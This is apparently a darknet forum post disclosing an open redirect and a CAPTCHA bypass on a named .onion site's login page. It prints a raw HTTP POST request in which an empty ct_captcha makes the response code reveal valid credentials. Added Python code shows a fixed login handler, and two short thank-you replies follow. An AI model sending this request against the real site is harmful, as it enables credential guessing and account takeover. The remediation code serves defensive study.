Basically, http://darkheroesq46awl.onion/login suffers from 2 vulnerabilities:
- Arbitrary URL Redirect
- CAPTCHA Bypass (CWE-203: Information Exposure Through Discrepancy)
The "Arbitrary URL Redirect" affects the POST parameter redirect_to. An attacker can use this to trick you into visiting a phishing site, or worse, deanonymize you.
Regarding "CAPTCHA Bypass", the CAPTCHA parameter in the login POST request is "ct_captcha". If you unset this (NULL value) or simply delete it, then you will get the "302" redirect if and only if the credentials are correct. Below is an example of a request that triggers this vulnerability:
POST /login HTTP/1.1
Host: darkheroesq46awl.onion
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://darkheroesq46awl.onion/register?i=
Cookie: PHPSESSID=a
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

redirect_to=https://www.example.com&username=USERNAME&password=PASSWORD&ct_captcha=&submit=Login+Now
Notice that "ct_captcha" has a null value. When USERNAME and PASSWORD equal a valid pair for an existing user, the HTTP response code is "302". When the pair is invalid (like you guessed a wrong password), the response code is "200".
Using this, it is possible to compromise accounts with shitty passwords very easily.
Be safe,
Your friendly DN Security Consultant.
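The two defects described in the post above (open redirect via redirect_to, and a CAPTCHA check that is skipped when ct_captcha is empty or absent, so the 302/200 discrepancy leaks whether credentials were valid) are closed by a login handler that validates the CAPTCHA before it ever looks at credentials, returns an identical response for every failure, and only redirects to local paths. The code below is an added example written for this page, not the site's own code: the handler name, the form/session dict layout, the constructed user store and the static salt are all assumptions; only the host name and the parameter names come from the post.

```python
# Added example (not from the original post or the site): a server-side login
# handler that closes both issues. Names and data structures are assumptions.
import hashlib
import hmac
from typing import Optional, Tuple
from urllib.parse import urlsplit

DEFAULT_LANDING = "/"

# Constructed sample credential store: username -> PBKDF2 hash.
# The static salt is for the demo only; real code uses a random per-user salt.
_SALT = b"constructed-demo-salt"


def _hash_password(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), _SALT, 100_000)


USERS = {"alice": _hash_password("correct horse")}      # hypothetical user
_DUMMY_HASH = _hash_password("unused")                  # keeps unknown-user timing similar


def safe_redirect_target(raw: Optional[str]) -> str:
    """Allow only a local absolute path (optionally with a query string).

    Anything with a scheme or host (https://..., //evil.example, javascript:)
    and the browser-tolerated variants '//x' and '/\\x' fall back to the
    default landing page, which removes the arbitrary redirect.
    """
    if not raw:
        return DEFAULT_LANDING
    parts = urlsplit(raw)
    if parts.scheme or parts.netloc:
        return DEFAULT_LANDING
    path = parts.path
    if not path.startswith("/") or path.startswith("//") or path.startswith("/\\"):
        return DEFAULT_LANDING
    return path + ("?" + parts.query if parts.query else "")


def handle_login(form: dict, session: dict) -> Tuple[int, Optional[str]]:
    """Return (http_status, Location header value).

    Every failure path returns the same (200, None), so the response does not
    reveal which check failed. The CAPTCHA is checked and consumed before the
    credentials are consulted, so an empty or missing ct_captcha never reaches
    the password comparison (the discrepancy the post relies on).
    """
    fail = (200, None)
    expected = session.get("captcha_answer")
    supplied = form.get("ct_captcha")
    if not expected or not supplied:
        return fail
    if not hmac.compare_digest(expected.encode("utf-8"), supplied.encode("utf-8")):
        return fail
    # One attempt per challenge: consume it whether or not the password is right.
    session.pop("captcha_answer", None)

    username = form.get("username", "")
    password = form.get("password", "")
    stored = USERS.get(username, _DUMMY_HASH)
    candidate = _hash_password(password)
    if username not in USERS or not hmac.compare_digest(stored, candidate):
        return fail

    return (302, safe_redirect_target(form.get("redirect_to")))


if __name__ == "__main__":
    # Constructed request mirroring the post: empty ct_captcha, valid credentials.
    session = {"captcha_answer": "x7k2"}
    form = {"redirect_to": "https://www.example.com", "username": "alice",
            "password": "correct horse", "ct_captcha": "", "submit": "Login Now"}
    print(handle_login(form, session))        # (200, None): no 302 without the CAPTCHA
    form["ct_captcha"] = "x7k2"
    print(handle_login(form, session))        # (302, '/'): external redirect_to replaced
```

The ordering matters as much as the checks: because the CAPTCHA comparison happens first and the same 200 is returned for a missing CAPTCHA, a wrong CAPTCHA and a wrong password, the status code no longer acts as a password oracle, and consuming the challenge on every attempt means each guess costs a fresh CAPTCHA solve.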
How is this not upvoted massively?
Thank you for taking the time to contribute this my friend.